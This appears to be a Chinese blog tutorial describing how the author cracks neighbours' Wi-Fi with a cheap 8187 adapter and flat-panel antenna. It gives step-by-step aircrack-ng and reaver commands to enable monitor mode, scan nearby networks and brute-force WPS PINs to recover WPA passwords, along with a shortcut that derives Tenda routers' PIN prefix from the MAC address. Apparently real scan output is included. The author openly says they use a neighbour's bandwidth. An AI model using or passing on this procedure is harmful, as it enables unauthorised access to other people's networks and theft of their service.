最近在淘宝入手了一套8187芯片主板与14DB平板天线，用我的老爷笔记本做了下测试，结果测试效果还行，邻居的电信带宽速度也不错。

具体涉及的无线安全技术：主要是扫描开放有WPS功能的无线路由器，然后通过开源软件reaver来暴力破解pin码，最后通过pin来得到无线路由器WPA-PSK密码。前面暴力破解时间稍微比较长，后面这个过程可以说是秒杀。

配置

基本配置就如下所示，出了笔记本电脑外其它就价格也就RMB120块左右。

8187 芯片主板 14DB平板天线 3米 USB2.0延长线 安装Linux 系统的笔记本

话说14DB的平板天线看起来还是很霸气的，关于事事如意18DB天线也测试了下效果差不多，不知道是不是楼层的问题。

准备工作

安装驱动和工具(aircrack-ng和reaver)，Ubuntu可以直接APT，其它系统可以需要下载源码安装，不过都很简单。

sudo apt-get install aircrack-ng sudo apt-get install reaver

破解过程

1、开启网卡的监控模式

sudo airmon-ng start wlan0

2、扫描附近的无线信号

sudo airodump-ng mon0

在这个过程中你会看到很多无线信号，主要观察几个参数 ：PWR(信号强度，越小越好)，MB(需要为54e.)。

BSSID      PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 68:53:21:E3:30:BE  -1 0 0 0 143 -1 <length: 0> BC:D1:77:25:76:84 -47 50 2 0 1 54e WPA2 CCMP PSK fire C8:3A:35:55:42:E8 -44 35 0 0 8 54e WPA CCMP PSK Tenda_5542E8 1C:FA:68:1C:7D:D6 -56 30 0 0 6 54e. WPA2 CCMP PSK hool A8:15:4D:83:6A:24 -51 29 5 0 11 54e. WPA2 CCMP PSK show F4:EC:38:3D:02:B6 -53 19 0 0 1 54e. WPA2 CCMP PSK

这里特别强调下Tenda路由器可以秒杀，其路由器的MAC前面地址为： C8:3A:35，后面6为是pin的前8位的十六进制。因此只需要复制MAC地址的后6位，然后转为十进制，就可以得到PIN码的前面的数字了。

3、破解PIN码

sudo reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1

知道PIN前面的数字的时候可以用下面这个命令：

sudo reaver -i mon0 -b MAC -a -S -vv -d 0 -c 6 -p 40000

-b 后面跟MAC地址

-c 频道，从扫描结果看

然后就开始破解了，等4个小时左右基本上可以搞定。

附上reaver调整参数的一些小技巧

reaver:

-i 监听后接口名称

-b 目标mac地址

-a 自动检测目标AP最佳配置

-S 使用最小的DH key（可以提高PJ速度）

-vv 显示更多的非严重警告

-d 即delay每穷举一次的闲置时间 预设为1秒

-t 即timeout每次穷举等待反馈的最长时间

-c 指定频道可以方便找到信号